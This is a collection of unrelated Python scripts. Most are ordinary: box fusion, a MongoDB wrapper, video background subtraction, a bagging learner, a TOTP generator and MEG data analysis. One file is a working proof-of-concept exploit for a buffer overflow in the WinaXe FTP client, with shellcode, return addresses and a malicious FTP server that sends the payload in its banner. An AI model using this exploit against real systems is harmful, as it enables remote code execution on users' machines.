def postprocess_fusion(df, fusion_type, iou_thr=0.5, sigma=0.1, skip_box_thr=0.0001):
    """Ensemble per-model detections image by image with ensemble_boxes.

    Args:
        df: per-box DataFrame as produced by string_to_row (columns
            image_id, model, class, confidence, x_min, y_min, x_max, y_max).
        fusion_type: one of 'wbf', 'nms', 'softnms', 'nmw'.
        iou_thr: IoU threshold for box matching.
        sigma: Soft-NMS sigma (only used for 'softnms').
        skip_box_thr: minimum score kept by WBF / NMW.

    Returns:
        DataFrame of fused boxes with integer pixel coordinates.

    Raises:
        ValueError: on an unknown fusion_type (the original silently fell
        through and raised NameError on `boxes` instead).
    """
    results = []
    image_ids = df["image_id"].unique()
    for image_id in tqdm(image_ids, total=len(image_ids), position=0, leave=True):
        # All annotations for the current image.
        data = df[df["image_id"] == image_id].reset_index(drop=True)
        annotations = {}
        weights = []
        # ensemble_boxes expects coordinates in [0, 1]; columns 4: are
        # x_min, y_min, x_max, y_max.
        # NOTE(review): assumes at least one coordinate is positive --
        # max_value == 0 would divide by zero. Confirm upstream.
        max_value = data.iloc[:, 4:].values.max()
        data.loc[:, ["x_min", "y_min", "x_max", "y_max"]] = data.iloc[:, 4:] / max_value
        # Group the image's boxes by source model.
        for idx, row in data.iterrows():
            model_id = row["model"]
            if model_id not in annotations:
                annotations[model_id] = {
                    "boxes_list": [],
                    "scores_list": [],
                    "labels_list": [],
                }
                # Equal weight per model.
                weights.append(1.0)
            annotations[model_id]["boxes_list"].append(
                [row["x_min"], row["y_min"], row["x_max"], row["y_max"]])
            annotations[model_id]["scores_list"].append(row['confidence'])
            annotations[model_id]["labels_list"].append(row["class"])
        # One sub-list per model, as required by ensemble_boxes.
        boxes_list = [annotations[m]["boxes_list"] for m in annotations]
        scores_list = [annotations[m]["scores_list"] for m in annotations]
        labels_list = [annotations[m]["labels_list"] for m in annotations]
        if fusion_type == 'wbf':
            boxes, scores, labels = weighted_boxes_fusion(
                boxes_list, scores_list, labels_list,
                weights=weights, iou_thr=iou_thr, skip_box_thr=skip_box_thr)
        elif fusion_type == 'nms':
            boxes, scores, labels = nms(
                boxes_list, scores_list, labels_list,
                weights=weights, iou_thr=iou_thr)
        elif fusion_type == 'softnms':
            boxes, scores, labels = soft_nms(
                boxes_list, scores_list, labels_list,
                sigma=sigma, weights=weights, iou_thr=iou_thr)
        elif fusion_type == 'nmw':
            boxes, scores, labels = non_maximum_weighted(
                boxes_list, scores_list, labels_list,
                weights=weights, iou_thr=iou_thr, skip_box_thr=skip_box_thr)
        else:
            raise ValueError("Unknown fusion_type: %r" % (fusion_type,))
        # De-normalise the fused boxes back to pixel coordinates.
        for box, score, label in zip(boxes, scores, labels):
            results.append({
                "image_id": image_id,
                "class": int(label),
                "confidence": round(score, 2),
                "x_min": int(box[0] * max_value),
                "y_min": int(box[1] * max_value),
                "x_max": int(box[2] * max_value),
                "y_max": int(box[3] * max_value),
            })
    return pd.DataFrame(results, columns=['image_id', 'class', 'confidence',
                                          'x_min', 'y_min', 'x_max', 'y_max'])
#MAIN
# Entry point: read every per-model submission CSV from --submission-path,
# fuse them with Weighted Boxes Fusion and write ensemble_submission.csv.
if __name__ == '__main__':
    parser = argparse.ArgumentParser(description='vinbigdata')
    parser.add_argument('--submission-path', type=str, required=True,
                        help='csv directory for single model detection')
    args = parser.parse_args()
    #Process each model submission
    ensemble_df = pd.DataFrame()
    # idx tags each CSV with a model id so postprocess_fusion can group by model.
    for idx, subs in enumerate (glob.glob(args.submission_path + '/*.csv')):
        print('Read from {}'.format(subs.split('/')[-1]))
        model_df = pd.read_csv(subs)
        # string_to_row (defined elsewhere) expands the submission string
        # format into one row per box.
        new_model_df = string_to_row(model_df, idx)
        ensemble_df = pd.concat([ensemble_df, new_model_df], axis=0)
    #Do WBF
    print("Shape of ensembled data before WBF: {}".format(ensemble_df.shape))
    wbf_ensemble = postprocess_fusion(ensemble_df, fusion_type='wbf')
    print("Shape of ensembled data after WBF: {}".format(wbf_ensemble.shape))
    #Convert back to submission format
    print("Converting to submission...")
    final_submission = row_to_string(wbf_ensemble)
    print("Shape of submission: {}".format(final_submission.shape))
    final_submission.to_csv(os.path.join(args.submission_path, 'ensemble_submission.csv'), index=False)
|
#!/usr/bin/env python
# coding=utf-8
import ConfigParser
import pymongo
class MongoConnection():
    """Thin wrapper around a pymongo connection configured from settings.ini."""
    def __init__(self):
        # Host and port come from the [mongodb] section of settings.ini.
        config = ConfigParser.SafeConfigParser()
        config.read("settings.ini")
        # NOTE(review): pymongo.Connection was removed in pymongo 3.x;
        # modern code would use pymongo.MongoClient — confirm pymongo version.
        self.conn = pymongo.Connection(config.get("mongodb", "host"), int(config.get("mongodb", "port")))
    def get_connection(self):
        """Return the raw pymongo connection object."""
        return self.conn
    def get_database(self, dbname):
        """Return database `dbname`, or None after printing an error."""
        try:
            return self.conn[dbname]
        except Exception:
            # BUG FIX: narrowed from a bare "except:", which also swallowed
            # KeyboardInterrupt/SystemExit. Still best-effort (returns None).
            print("open database failed!")
    def get_collection(self, dbname, collection_name):
        """Return collection `collection_name` in `dbname`, or None on error."""
        try:
            return self.conn[dbname][collection_name]
        except Exception:
            print("get collection failed!")
# Smoke test: open a connection using settings.ini.
if __name__ == '__main__':
    mc = MongoConnection()
    conn = mc.get_connection()
|
#!/usr/bin/env python
__author__ = "Master Computer Vision. Team 02"
__license__ = "M6 Video Analysis"
# Import libraries
import os
import math
import cv2
import numpy as np
from scipy import ndimage
from evaluate import *
from sklearn.metrics import confusion_matrix
from skimage.segmentation import clear_border
from PIL import Image
from skimage.measure import label
from skimage.measure import regionprops
from util import preprocess_pred_gt
from morphology import dilation, remove_dots, erosion
from hsv_shadow_remove import hsv_shadow_remove
# Define colors spaces to transform frames
# Maps a colour-space name to the OpenCV BGR -> target conversion code.
colorSpaceConversion={}
colorSpaceConversion['YCrCb'] = cv2.COLOR_BGR2YCR_CB
colorSpaceConversion['HSV'] = cv2.COLOR_BGR2HSV
colorSpaceConversion['gray'] = cv2.COLOR_BGR2GRAY
# Path to save images and videos
images_path = "std-mean-images/"
video_path = "background-subtraction-videos/"
# Define groundtruth labels namely
# Pixel values used by the ground-truth masks (changedetection.net convention).
STATIC = 0
HARD_SHADOW = 50
OUTSIDE_REGION = 85
UNKNOW_MOTION = 170
MOTION = 255
# Global flag: 1 enables HSV-based shadow removal inside gaussian_color().
shadow_removal = 1
def get_accumulator(path_test):
    """
    Return the float32 accumulator array sized for the chosen dataset.

    The (rows, cols, frames) dimensions are hard-coded per dataset path;
    an unknown path yields an empty (0, 0) array.
    """
    # Known dataset paths mapped to their accumulator shapes.
    dataset_shapes = {
        "./highway/input/": (240, 320, 150),
        "./fall/input/": (480, 720, 50),
        "./traffic/input/": (240, 320, 50),
    }
    shape = dataset_shapes.get(path_test, (0, 0))
    return np.zeros(shape, np.float32)
def gaussian_color(path_test, path_gt, first_frame, last_frame, mu_matrix, sigma_matrix, alpha, colorSpace, connectivity, areaPixels,ac_morphology,SE1size,SE2size):
    """
    Per-pixel Gaussian background subtraction over a frame sequence.

    Classifies each pixel as foreground when |frame - mu| >= alpha*(sigma+2)
    in every colour channel, optionally removes shadows (HSV heuristic),
    fills holes, applies morphology and an area filter, writes result
    videos, and accumulates TP/FP/TN/FN against the ground truth.

    Input: path_test, path_gt, first_frame, last_frame, mu_matrix, sigma_matrix,
           alpha, colorSpace, connectivity ('4'/'8'), areaPixels (min region
           area, 0 disables), ac_morphology (1 enables), SE1size/SE2size
           (structuring-element sizes)
    Output: AccFP, AccFN, AccTP, AccTN, AccP, AccR, AccF1
    """
    # Initialize metrics accumulators
    AccFP = 0
    AccFN = 0
    AccTP = 0
    AccTN = 0
    AccP = []
    AccR = []
    AccF1 = []
    # Initialize index to accumulate images
    index = 0
    # Define the codec and create VideoWriter object
    fourcc = cv2.VideoWriter_fourcc(*'XVID')
    out = cv2.VideoWriter(video_path+"gaussian_color_"+str(path_test.split("/")[1])+"_connectivity_"+str(connectivity)+".avi", fourcc, 60, (get_accumulator(path_test).shape[1], get_accumulator(path_test).shape[0]))
    out_noshadow = cv2.VideoWriter(video_path + "mask" +str(path_test.split("/")[1])+"_connectivity_"+str(connectivity)+".avi", fourcc, 60, (get_accumulator(path_test).shape[1], get_accumulator(path_test).shape[0]))
    # Define structuring element according to connectivity
    structuring_element = [[0,0,0],[0,0,0],[0,0,0]]
    if connectivity == '4':
        structuring_element = [[0,1,0],[1,1,1],[0,1,0]]
    if connectivity == '8':
        structuring_element = [[1,1,1],[1,1,1],[1,1,1]]
    # Read sequence of images sorted
    for filename in sorted(os.listdir(path_test)):
        # Check that frame is into range; frame number is encoded in
        # characters 2..7 of the file name (e.g. "in000123.jpg").
        frame_num = int(filename[2:8])
        if frame_num >= first_frame and frame_num <= last_frame:
            # Read image from groundtruth
            frame = cv2.imread(path_test+filename)
            # Check and transform color space
            if colorSpace != 'RGB':
                frame = cv2.cvtColor(frame, colorSpaceConversion[colorSpace])
            # Compute pixels that belongs to background: a pixel is foreground
            # only when the threshold holds in ALL channels (np.prod over axis 2).
            background = np.prod(abs(frame - mu_matrix) >= alpha*(sigma_matrix+2),axis=2)
            background_mask = background ##ADDED AUX VARIABLE
            # Convert bool to int values
            background = background.astype(int)
            # Replace 1 by 255
            background[background == 1] = 255
            # Scales, calculates absolute values, and converts the result to 8-bit
            background = cv2.convertScaleAbs(background)
            # Read groundtruth image
            gt = cv2.imread(path_gt+"gt"+filename[2:8]+".png", 0)
            # Shadow removal (module-level flag)
            if shadow_removal == 1:
                shadow_mask = hsv_shadow_remove(cv2.imread(path_test + filename), mu_matrix)
                # Convert Boolean to 0, 1
                shadow_mask = 1*shadow_mask
                # Keep only foreground pixels that are NOT shadow.
                not_mask = np.logical_not(shadow_mask)
                background_noshadow = np.logical_and(not_mask, background_mask)
                background_noshadow = background_noshadow.astype(int)
                # Replace 1 by 255
                background_noshadow[background_noshadow == 1] = 255
                # Scales, calculates absolute values, and converts the result to 8-bit
                background_noshadow = cv2.convertScaleAbs(background_noshadow)
                background_frame_noshadow = cv2.cvtColor(background_noshadow, cv2.COLOR_GRAY2RGB)
                # Write the shadow mask itself to the secondary video.
                shadow_mask = shadow_mask.astype(int)
                shadow_mask[shadow_mask == 1] = 255
                shadow_mask = cv2.convertScaleAbs(shadow_mask)
                shadow_mask = cv2.cvtColor(shadow_mask, cv2.COLOR_GRAY2RGB)
                out_noshadow.write(shadow_mask)
                #out_noshadow.write(background_frame_noshadow)
                background = background_noshadow
            # Hole filling
            background = ndimage.binary_fill_holes(background, structure=structuring_element).astype(int)
            # Optional morphology: dilate, re-fill, erode, then drop small dots.
            if ac_morphology==1:
                background = dilation(background,SE1size)
                background = ndimage.binary_fill_holes(background, structure=structuring_element).astype(int)
                background = erosion(background,SE1size)
                background = remove_dots(background,SE2size)
            # Replace 1 by 255
            background[background == 1] = 255
            # Scales, calculates absolute values, and converts the result to 8-bit
            background = cv2.convertScaleAbs(background)
            # Area filltering, label background regions
            label_image = label(background)
            # Measure properties of labeled background regions
            if areaPixels > 0:
                for region in regionprops(label_image):
                    # Remove regions smaller than fixed area (blanks the bbox,
                    # not just the region pixels).
                    if region.area < areaPixels:
                        minr, minc, maxr, maxc = region.bbox
                        background[minr:maxr,minc:maxc] = 0
            bck, gt = preprocess_pred_gt(background, gt)
            # Evaluate results
            TP, FP, TN, FN = evaluate_sample(bck, gt)
            # Accumulate metrics
            AccTP = AccTP + TP
            AccTN = AccTN + TN
            AccFP = AccFP + FP
            AccFN = AccFN + FN
            # Write frame into video
            video_frame = cv2.cvtColor(background, cv2.COLOR_GRAY2RGB)
            out.write(video_frame)
    # Compute metrics (precision, recall, F1) guarding the zero denominators.
    print(" AccTP: {} AccFP: {} AccFN: {}".format(AccTP, AccFP, AccFN))
    if AccTP+AccFP == 0:
        AccP = 0
    else:
        AccP = AccTP / float(AccTP + AccFP)
    if AccTP + AccFN == 0:
        AccR = 0
    else:
        AccR = AccTP / float(AccTP + AccFN)
    if AccR == 0 and AccP == 0:
        AccF1 = 0
    else:
        AccF1 = 2 * AccP * AccR / (AccP + AccR)
    return AccFP, AccFN, AccTP, AccTN, AccP, AccR, AccF1
|
import os
import sys
import shutil
sys.path.insert(0, os.path.join("tools", "families"))
import fam
def export_note(output_dir):
    """Write a README.txt into output_dir describing the exported layout."""
    readme_lines = [
        "This directory contains the datasets used in GeneRax paper.\n",
        "The cyanobacteria datasets comes from the ALE paper.\n",
        "We extracted the primates dataset from ENSEMBL.\n",
        "We generated the jsim datasets with jprime and seqgen.\n",
        "\n",
        "Each directory follows the exact same structure.\n",
        "- species_tree contains the species trees.\n",
        "- families contains the gene families.\n",
        "- alignments contains symlink to the alignments (the real files are in the family directories).\n",
        "\n",
        "Each gene family directory contains:\n",
        "- the MSA alignment (either fasta or phylip).\n",
        "- the gene to species mapping file.\n",
        "- gene_trees: a directory with all the trees we inferred for the paper, including the true tree for simulated datasets (for empirial datasets, the \"true\" trees are the trees from the database and should not be seen as the ground truth!!).\n",
        ".\n",
    ]
    with open(os.path.join(output_dir, "README.txt"), "w") as writer:
        writer.writelines(readme_lines)
def export_dataset(dataset, output_dir):
    """Copy one dataset (species tree, alignments, families) into output_dir."""
    source_dir = fam.get_datadir(dataset)
    target_dir = os.path.join(output_dir, dataset)
    os.mkdir(target_dir)
    print(" copy species tree")
    shutil.copytree(fam.get_species_dir(source_dir), fam.get_species_dir(target_dir))
    print(" copy alignments directory")
    # Alignments are symlinks into the family dirs; keep them as symlinks.
    shutil.copytree(fam.get_alignments_dir(source_dir), fam.get_alignments_dir(target_dir), symlinks = True)
    print(" copy families directory")
    # "misc" subdirectories are internal and excluded from the export.
    shutil.copytree(fam.get_families_dir(source_dir), fam.get_families_dir(target_dir), ignore=shutil.ignore_patterns("misc"))
def export_all_data(output_dir):
    """
    Rebuild output_dir from scratch and export every dataset.

    Exports all jsim* simulated datasets plus the cyanobacteria and
    primates datasets, after writing the README.
    """
    print("Removing previous files...")
    # Best-effort cleanup; ignore_errors replaces the old bare
    # "try/except: pass", which also swallowed KeyboardInterrupt.
    shutil.rmtree(output_dir, ignore_errors=True)
    os.mkdir(output_dir)
    export_note(output_dir)
    datasets = []
    # All simulated datasets generated with jprime ("jsim" prefix).
    for dataset in os.listdir(fam.get_datasets_family_path()):
        if dataset.startswith("jsim"):
            datasets.append(dataset)
    datasets.append("cyano_empirical")
    datasets.append("cyano_simulated")
    datasets.append("ensembl_96_ncrna_primates")
    for dataset in datasets:
        print("Exporting dataset " + dataset)
        export_dataset(dataset, output_dir)
if __name__ == "__main__":
    output_dir = "extracted_data"
    export_all_data(output_dir)
|
#import GPIO library & time
import RPi.GPIO as GPIO
import time
#Pin numbers
# Physical (BOARD-numbered) pins driving the three LEDs.
led1 = 7
led2 = 11
led3 = 13
#set GPIO numbering mode and define input pin
GPIO.setmode(GPIO.BOARD)
#OUT
for ledX in [led1, led2, led3]:
    GPIO.setup(ledX,GPIO.OUT) # Set led's mode is output
    GPIO.output(ledX, GPIO.LOW) # Set led to low(0V) for clean start
# Cycle the LEDs on and then off, 0.2 s per step, until Ctrl-C.
try:
    while True:
        for ledX in [led1, led2, led3]:
            GPIO.output(ledX, GPIO.HIGH) # Set led to high(3V)
            time.sleep(0.2)
        for ledX in [led1, led2, led3]:
            GPIO.output(ledX, GPIO.LOW) # Set led back to low(0V)
            time.sleep(0.2)
except KeyboardInterrupt:
    # Release the GPIO pins so they are left in a safe state on exit.
    GPIO.cleanup()
|
"""
A Bag Learner wrapper. (c) 2017 Paul Livesey
"""
import numpy as np
class BagLearner(object):
    """
    Bootstrap-aggregating (bagging) ensemble around an arbitrary learner.

    Each bag trains a fresh `learner` instance on a random sample drawn
    (with replacement) from the first 60% of the training rows; queries
    return the mean prediction across all bags.
    """
    def __init__(self,
                 learner,
                 kwargs,
                 bags = 20,
                 boost = False,
                 verbose = False):
        # learner: class of the underlying learner; kwargs: its constructor args.
        self.learner = learner
        self.kwargs = kwargs
        self.bags = bags
        self.boost = boost      # accepted for API compatibility; not implemented
        self.verbose = verbose
        # CONSISTENCY FIX: addEvidence/query use a dict (bag index -> trained
        # learner); the old __init__ initialised this to an ndarray instead.
        self.results = {}

    def author(self):
        """Return the author's Georgia Tech username."""
        return 'plivesey3'

    def addEvidence(self,dataX,dataY):
        """
        @summary: Add training data to learner (trains one learner per bag)
        @param dataX: X values of data to add (2-D array)
        @param dataY: the Y training values (1-D array)
        """
        self.results = {}
        # Sample indices come from the first 60% of the rows, with replacement.
        sample_size = int(0.6 * dataX.shape[0])
        for bag in range(self.bags):
            # Vectorized bootstrap sample — replaces the old row-by-row
            # np.vstack loop, which was O(n^2).
            choices = np.random.randint(sample_size, size=sample_size)
            built_bag = dataX[choices]
            built_bag_res = dataY[choices]
            # Train a fresh learner on this bag's sample.
            new_learner = self.learner(**self.kwargs)
            new_learner.addEvidence(built_bag, built_bag_res)
            self.results[bag] = new_learner

    def query(self,points):
        """
        @summary: Estimate a set of test points given the model we built.
        @param points: should be a numpy array with each row corresponding to a
        specific query.
        @returns the estimated values (mean over all bags).
        """
        # BUG FIX: the accumulator must start at zero; the old code used
        # np.empty, which leaves uninitialised garbage that was then summed
        # into the predictions.
        totals = np.zeros(points.shape[0])
        for bag_learner in self.results.values():
            totals += bag_learner.query(points)
        return totals / len(self.results)
# Module self-test marker (Python 2 print statement).
if __name__=="__main__":
    print "the secret clue is 'zzyzx'"
|
import socket,struct
import sys
#WinaXe v7.7 FTP Client 'Service Ready' Command Buffer Overflow Exploit
#Discovery hyp3rlinx
#ISR: ApparitionSec
#hyp3rlinx.altervista.org
#shellcode to pop calc.exe Windows 7 SP1
# Published proof-of-concept payload (Python 2 script). Kept as-is.
sc=("\x31\xF6\x56\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B"
"\x6E\x08\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B"
"\x4B\x18\x8B\x7B\x20\x01\xEF\x8B\x7C\x8F\xFC\x01\xEF\x31"
"\xC0\x99\x32\x17\x66\xC1\xCA\x01\xAE\x75\xF7\x66\x81\xFA"
"\x10\xF5\xE0\xE2\x75\xCF\x8B\x53\x24\x01\xEA\x0F\xB7\x14"
"\x4A\x8B\x7B\x1C\x01\xEF\x03\x2C\x97\x68\x2E\x65\x78\x65"
"\x68\x63\x61\x6C\x63\x54\x87\x04\x24\x50\xFF\xD5\xCC")
eip=struct.pack('<L',0x68084A6F) #POP ECX RET
jmpesp=struct.pack('<L',0x68017296) #JMP ESP
#We will do POP ECX RET and place a JMP ESP address at the RET address that will jump to shellcode.
payload="A"*2061+eip+jmpesp+"\x90"*10+sc+"\x90"*20 #Server Ready '220' Exploit
port = 21
# Listen on the host given as the first CLI argument.
s = socket.socket()
host = sys.argv[1]
s.bind((host, port))
s.listen(5)
print 'Evil FTPServer listening...'
# Send the banner to every client that connects.
while True:
    conn, addr = s.accept()
    conn.send('220'+payload+'\r\n')
    conn.close()
|
import imaplib
import email
from email import message
import time
# Gmail IMAP credentials — placeholders; replace before running.
username = 'gmail_id'
password = 'gmail_password'
# Build a minimal RFC 822 message to append to the mailbox.
new_message = email.message.Message()
new_message.set_unixfrom('satheesh')
new_message['Subject'] = 'Sample Message'
# from gmail id
new_message['From'] = 'eppalapellisatheesh1@gmail.com'
# to gmail id
new_message['To'] = 'eppalapellisatheesh1@gmail.com'
# message data
new_message.set_payload('This is the body of the message.\n')
# print(new_message)
# you want to connect to a server; specify which server and port
# server = imaplib.IMAP4('server', 'port')
server = imaplib.IMAP4_SSL('imap.googlemail.com')
# after connecting, tell the server who you are to login to gmail
# server.login('user', 'password')
server.login(username, password)
# this will show you a list of available folders
# possibly your Inbox is called INBOX, but check the list of mailboxes
response, mailboxes = server.list()
if response == 'OK':
    response, data = server.select("Inbox")
    # APPEND the message directly into INBOX with the current timestamp.
    response = server.append('INBOX', '', imaplib.Time2Internaldate(time.time()), str(new_message).encode('utf-8'))
    # print(response)
    # append() returns a (status, data) tuple, so check the first element.
    if response[0] == 'OK':
        print("Gmail Appended Successfully")
    else:
        print("Not Appended")
server.close()
server.logout()
|
#!/usr/bin/env python
import optparse
class IridiumMobileIFace:
    """Command-line front end for an Iridium satellite messaging interface.

    NOTE(review): only argument parsing is implemented here; the options are
    printed, not acted upon (Python 2 script).
    """
    def __init__(self):
        pass
    def main(self):
        # Declare the supported CLI options; "append" actions allow each
        # option to be given multiple times.
        op=optparse.OptionParser()
        op.add_option("--fetch", help="Fetch messages from satellite network", action="store_true")
        op.add_option("--mail", help="Send email from file", action="append")
        op.add_option("--twitter-status", help="Update twitter status", action="append")
        op.add_option("--twitter-message", help="Send twitter private message", nargs=2, action="append", metavar="USER MESSAGE")
        op.add_option("--reg-send-auth", help="Register sending authorization", nargs=2, action="append", metavar="TOKEN NBYTES")
        op.add_option("-s", "--serial-port", help="Set serial port", action="store")
        (options, arg)=op.parse_args()
        print options, arg
if __name__=="__main__":
    IridiumMobileIFace().main()
|
"""
@author: vyildiz
"""
# Import the modules to be used from Library
import numpy as np
import math
from scipy import special
import matplotlib.pyplot as plt
import statistics
from func_FDC import *
def postplot(num, M, V, L, os_probability, streamflow, av_multiplier, Q_futures , Nsize, low_percentile, case_to_derive):
    """
    This function plots 4 figures.
    The first three figures compare the sampled statistical parameters with
    the ones re-derived from the generated flows, to show if they match.
    The last figure shows a random 3 years of observed stream flow vs derived streamflow
    - num: the size of sampling
    - M: sampled median values
    - V: sampled coefficient of variation (Cv) values
    - L: sampled first percentile values
    - os_probability: the exceedance probability of the streamflow records
    - streamflow: input data (observed discharge)
    - av_multiplier: available set of multipliers
    - Nsize: size of the time series (input)
    - Q_futures: generated future flows
    - low_percentile: the coefficient of low percentile function
    - case_to_derive: mean or median case
    """
    # Figure 1: Fit KOSUGI MODEL to historical data
    # Figure 2: derived FDCs
    # Derive streamflow statistics from the generated futures (func_FDC helper).
    Q_m, Q_v, Q_low = streamflow_statistics(Q_futures, low_percentile, num, case_to_derive)
    # Figure 3: plot sampled vs calculated mean/median values
    plt.plot(Q_m, 'ro', label="Derived")
    plt.plot(M, 'b*', label="Sampled")
    plt.legend(loc="upper right")
    plt.grid()
    plt.xlabel("Futures")
    plt.ylabel("M")
    plt.savefig('PostProcessor_plots' + '/Fig3-M.png')
    plt.clf()
    # Figure 4: plot sampled vs calculated Std/CV values
    plt.plot(Q_v, 'ro', label="Derived")
    plt.plot(V, 'b*', label="Sampled")
    plt.legend(loc="upper right")
    plt.grid()
    plt.xlabel("Futures")
    plt.ylabel("V")
    plt.savefig('PostProcessor_plots' + '/Fig4-V.png')
    plt.clf()
    # Figure 5: plot sampled vs calculated low percentile values
    plt.plot(Q_low, 'ro', label="Derived")
    plt.plot(L, 'b*', label="Sampled")
    plt.legend(loc="upper right")
    plt.grid()
    plt.xlabel("Futures")
    plt.ylabel("Low Percentile [$m^3/s$]")
    plt.savefig('PostProcessor_plots' + '/Fig5-Low.png')
    plt.clf()
    #Figure 6: Random 3 years of observed stream flow vs derived streamflow
    plt.figure(figsize=(11, 6))
    # Pick a "wet" scenario (Cv multiplier > 1.75, median multiplier in (0.5, 0.75)).
    idplot = np.where((av_multiplier[:,1] > 1.75) & (av_multiplier[:,0] < 0.75) & (0.5 < av_multiplier[:,0]) ) # find the scenario to plot
    idplot = np.asarray(idplot) # converting tuple into int array
    if np.size(idplot) == 0:
        # Fall back to any scenario with a large Cv multiplier.
        idplot = np.where(av_multiplier[:,1] >= 1.75)
        idplot = np.asarray(idplot) # converting tuple into int array
    idplot = np.min(idplot) # get one of the indices if there is more than one
    qplot = Q_futures[:,idplot] # select the future
    qplot = np.reshape(qplot, (len(os_probability),1))
    #plt.plot(streamflow[8765:-1],'r')
    #plt.plot(qplot[8765:-1],c='0.35')
    # Index 8765 skips the first ~24 years of daily records; the tail is
    # roughly 3 years — presumably daily data, TODO confirm with caller.
    plt.plot(streamflow[8765:-1],'r', label="Observed Streamflow")
    plt.plot(qplot[8765:-1], label="Derived Streamflow",c='0.35')
    plt.legend(loc="upper right")
    plt.xlabel("Time [Days]")
    plt.ylabel("Discharge [$m^3/s$]")
    plt.grid()
    plt.xlim(0, len(qplot[8765:-1])+10)
    plt.legend(bbox_to_anchor=(1.05, 1))
    plt.tight_layout()
    plt.savefig('PostProcessor_plots' + '/Fig6-ObservedvsDerived_discharge.png')
    plt.clf()
|
def find_next_square(sq):
    """
    Return the next perfect square after sq if sq is itself a perfect
    square, otherwise -1.

    Uses integer arithmetic (math.isqrt) instead of float sqrt so the
    result is exact even for very large inputs, and returns an int
    rather than a float.
    """
    from math import isqrt  # local import keeps this snippet self-contained
    root = isqrt(sq)
    return (root + 1) ** 2 if root * root == sq else -1
'''
Complete the findNextSquare method that finds the next integral perfect square
after the one passed as a parameter. Recall that an integral perfect square
is an integer n such that sqrt(n) is also an integer.
If the parameter is itself not a perfect square, then -1 should be returned.
You may assume the parameter is positive.
Examples:
findNextSquare(121) --> returns 144
findNextSquare(625) --> returns 676
findNextSquare(114) --> returns -1 since 114 is not a perfect square
'''
|
#!/usr/bin/env python
# -*- coding:utf-8 -*-
import hmac
import hashlib
import base64
import struct
import time
import sys
def g_code_3(token):
    """
    Generate a 6-digit TOTP code (RFC 6238, 30-second time step) from a
    base32-encoded shared secret.

    @param token: base32-encoded secret (str or bytes)
    @return: 6-character numeric one-time password
    """
    key = base64.b32decode(token)
    # Pack the current 30-second interval count as a big-endian unsigned long long.
    pack = struct.pack(">Q", int(time.time()) // 30)
    # HMAC-SHA1 of the interval counter, keyed with the decoded secret.
    sha = hmac.new(key, pack, hashlib.sha1).digest()
    # Dynamic truncation (RFC 4226): low 4 bits of the last byte pick the offset.
    o = sha[19] & 15
    pwd = str((struct.unpack(">I", sha[o:o + 4])[0] & 0x7fffffff) % 1000000)
    # BUG FIX: left-pad to exactly 6 digits. The old code prepended at most a
    # single '0', producing short codes whenever the value had < 5 digits.
    return pwd.zfill(6)
# CLI: print the TOTP code for the base32 secret given as the first argument.
if __name__ == '__main__':
    print(g_code_3(token=sys.argv[1]))
|
# -*- coding: utf-8 -*-
"""
Created on Fri Sep 20 14:12:48 2013
@author: bejar
"""
import scipy.io
import numpy as np
from scipy import corrcoef
from sklearn.cluster import spectral_clustering,affinity_propagation
import matplotlib.pyplot as plt
from pylab import *
from sklearn.metrics import silhouette_score
from sklearn.manifold import spectral_embedding
from matplotlib.colors import ListedColormap
from mpl_toolkits.mplot3d import Axes3D
from sklearn.neighbors import KNeighborsClassifier
from sklearn.svm import SVC
from sklearn.cross_validation import cross_val_score
import pylab as pl
from scipy import corrcoef
from sklearn.decomposition import PCA,KernelPCA
def correlationMatrix(mdata,linit,lend,nstep):
    """
    Average correlation matrix over nstep consecutive windows of columns
    [linit, lend) of mdata (channels x samples).
    """
    # BUG FIX: integer division. Under Python 3 the old "/" produced a float
    # step, which range() rejects; "//" is identical for Python 2 ints.
    lstep = (lend - linit) // nstep
    corr = np.zeros((mdata.shape[0], mdata.shape[0]))
    for start in range(linit, lend, lstep):
        # Channel-by-channel correlation within this window of samples.
        corr += corrcoef(mdata[:, start:start + lstep])
    corr /= nstep
    return corr
def exampleData(name):
    """Load a MEG recording and return the upper-triangular entries of its
    averaged channel-correlation matrix as a 1-D feature vector.

    Keeps only 'A*' channels, excluding four known-bad sensors.
    (Python 2 script; cpath is a module-level global.)
    """
    mats=scipy.io.loadmat( cpath+name+'.mat')
    data= mats['data']
    chann= mats['names']
    j=0
    mdata=None
    lch=[]
    for i in range(chann.shape[0]):
        cname=chann[i][0][0]
        # Keep 'A' channels except the four excluded sensors.
        if cname[0]=='A' and cname!='A53' and cname!='A31' and cname!='A44' and cname!='A94':
            j+=1
            if mdata==None:
                mdata=data[i]
            else:
                mdata=np.vstack((mdata,data[i]))
            lch.append(cname)
    print sort(lch)
    # Average correlation over 10 windows of the first 400k samples.
    cmatrix=correlationMatrix(mdata,0,400000,10)
    # One feature per unordered channel pair (upper triangle).
    examp=np.zeros((j*(j-1)/2))
    print j
    p=0
    for i in range(cmatrix.shape[0]-1):
        for j in range(i+1,cmatrix.shape[0]):
            #if np.isnan(corr[i,j]) or corr[i,j]<0.7:
            examp[p]=cmatrix[i,j]
            p+=1
    return examp
# Data and results directories (hard-coded local paths).
cpath='/home/bejar/MEG/Data/'
cres='/home/bejar/Documentos/Investigacion/MEG/res/'
#name='MMN-201205251030'
name='control1-MMN'
# Load precomputed per-patient correlation features and their class labels.
mats=scipy.io.loadmat( cres+'patcorr.mat')
data= mats['data']
cl=mats['classes']
classes=[]
for i in range(cl.shape[0]):
    classes.append(cl[i][0])
classes =np.array(classes)
lcol=cl
X=data
Y=classes
# Commented-out SVM cross-validation experiments kept for reference.
#for c in [0.001,0.01,0.1,1,10,100]:
#    clf = SVC(C=c,kernel='linear')
#    score=cross_val_score(clf,X,Y,cv=10)
#    print c,':',np.mean(score),np.std(score)
#
#for c in [0.001,0.01,0.1,1,10,100,1000,10000]:
#    clf = SVC(C=c,kernel='linear')
#    clf.fit(X,Y)
#    #print clf.n_support_
#    print clf.predict(X)
# Project the feature vectors to 3 components for visualisation.
examps=X
trans=PCA(n_components=3)
trans.fit(examps)
X=trans.transform(examps)
#X=examps
#Y=np.array(lcol)
#patdata={}
#patdata['data']=X
#patdata['classes']=Y
#scipy.io.savemat(cres+'patcorr',patdata,do_compression=True)
# 3-D scatter of the PCA projection, coloured by class.
ax=pl.subplot(1, 1, 1, projection='3d')
pl.scatter(X[:,0],X[:,1],zs=X[:,2],c=lcol,s=25)
pl.show()
#c=1
#clf = SVC(C=c,kernel='linear',probability=True)
#clf.fit(X,Y)
#
#val=exampleData('comp10-MEG')
#
